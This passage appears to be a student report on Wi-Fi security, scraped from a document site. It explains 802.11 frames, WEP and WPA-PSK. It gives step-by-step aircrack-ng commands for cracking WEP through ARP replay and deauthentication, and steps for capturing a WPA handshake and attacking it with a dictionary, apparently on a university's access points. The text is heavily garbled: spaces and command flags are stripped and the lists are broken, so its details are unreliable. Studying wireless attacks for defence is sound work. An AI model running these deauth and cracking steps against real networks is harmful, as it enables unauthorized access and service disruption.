Professional Documents
Culture Documents
WiFisecurityonWPAPSK/WPA2PSK
Summitedto:
Step2:Sincewehavetoworkwithourwirelesscardfirstwehavetobringupthewirelessinterfaceandthenwe havetoputitinthemonitormodeforpurposeofpacketsniffing.Whiledoingthatwealsolaunchwireshark
Aswecanseefromabovecapturewehaveenabledthemonitormodeandalsoopenwiresharkto
capturethetrafficontheair.Themonitorinterfacemon0 canbeseeninwiresharkwindow WiFisniffingismorecomplicatedduetothreedifferentoperatingfrequenciesassignedbythestandard: 1. 2. 3. 2.4GHz(assignedto802.11b/g/n) 3.6GHz(alreadyoccupiedby802.11y) 4.9/5.0GHz(for802.11a/h/j/n)
Since most of UniBs Access points configured to use channel one which is around 2.412GHz we set monitor interface to channel1 Thenthestatusinformationwillbeasfollows
Thefirstchannelisaround 2.412GHz
LetscaptureWiFisignalonchannel1
This how traffic sniffing done in the wireless world because the radio transmission is vulnerable to any active or passive attacker.
RevisitingWirelessFrames
Wirelesscommunicationusesframestocommunicate.Theframeheaderandtrailercontentgivenbelow:
AboveallFramecontrolhasmorecomplexstructure:
Protocol:settozero(setto0)unlessitsbecomebackwardincompatible. Type:Defineifframeismanagement(setto00),control(setto01)orData(setto10)witheachsubtype.
ToDS FromDS Interpretation 0 0 STAtoSTAinsameIBSS,noAPisinvolved 0 1 ExitDS(generatedbyAP) 1 0 EnterDS(sentfromAPportaccessentity 1 1 UsedinWiFiDS(WDS)itsAPreplay MoreFrag:indicatemoreframefragmenttocomeincaseoflargeframes Retry:indicateifcurrentframeisoriginal(setto0)orretransmitted(setto1)
Duration/ID: used to set NAV (Network Allocation Vector). Its a minimum amount of time STA need to wait before transmitting. Address1/2/3/4:representsthefollowingaddress 1. 2. SourceandDestinationAddress BSSIDaddress
WLANAuthentication
Authenticationinwirelesssystemtakestwoforms: Openauthentication: Noactualauthenticationtakesplacebetweenthem. Onlytwopacketsexchangebetweenthemandauthenticationends.
Sharedkeyauthentication
ThechallengeisencryptedusingWEPkey.WEPusesRC4streamcipher.
WiredEquivalentPrivacy(WEP)
ItsthefirstencryptionstandardmadeavailableforWiFi. UseRC4(i.esymmetrickeyencryption:bothAPandSTAshassamepresharedkey)
TheactualIVvalues
WEPSTEP3:Ciphertextgenerator
ConcatenateddataandICV
WEPDecryption
IfICVcomputedinAPissameastheonesentbySTAthenintegrityofthemessageiskeptandits neverbeenaltered
CapturedARPpacketrepeatedblindlyuntillnetworkreplythenwehaveawinner
ARPpacketarefixedsizeandhasMACaddressofdestination
Step1:letscapturestrafficonmonitormode root@ubuntu:~#airodumpngchannel1mon0 Step2:letsnowselectourbssidandsave root@ubuntu:~#airodumpngchannel1mon0writeonlinecrackingbssidMAC_AddofAP Step3:nowletsblindlysendARPreplayattack root@ubuntu:~#aireplayngarpreplayessid_namemon0 Step4:letsbreakconnectionbetweennodeandAP root@ubuntu:~#aireplayngdeauth0essid_namemon0 Step5:letssendARPrequestandsimulateARPresponse root@ubuntu:~#aireplayngarpreplayessid_namehclient_MACmon0 Step6:at this point airodumpng register the packet sniffed in onlinecracking pcap file. Now lets go to real crackingpart.Wepasstheonlinecracking01.capfiletoaircrackng root@ubuntu:~#aircrackngonlinecracking01.cap
UnderstandingWPA/WPA2
WPA:isintermediatesolutionforWiFisecurityusesTKIP(TemporalKeyIntegrityprotocol)thatbasedonWEP.
WPAPSK: is vulnerable to dictionary attack. Input required for this attack is the WPA 4way handshake between AP and
clientandwordlistcontainingcommonpassphrase.
PMK(pairwisemasterkey):allkeyderivedfrom it.ItsgeneratedbothinAPandclient
Itslongrandomvaluesentasachallengeforclient
ThehackingofWPAPSKisdonebyimplementingDictionaryattack:
Stepsforthehackingasfollows Step1:snifftheairforpackets
Step2:CaptureandsavethedesiredAPsniffedtraffic
step3: lets connect new client and capture the 4way WPA handshake packets or send deauth packet to force clienttoreconnect Step4:airodumpngwillshowthehandshakeandwelaunchtocapturethepacketinwireshark.Concentrateon EAPOLpackets.Itcapturesauthentication,4wayhandshakepacketthatenableustocrackit.
Step5:Wepreparethedictionarywithcommonpassphrasepasstoaircrackng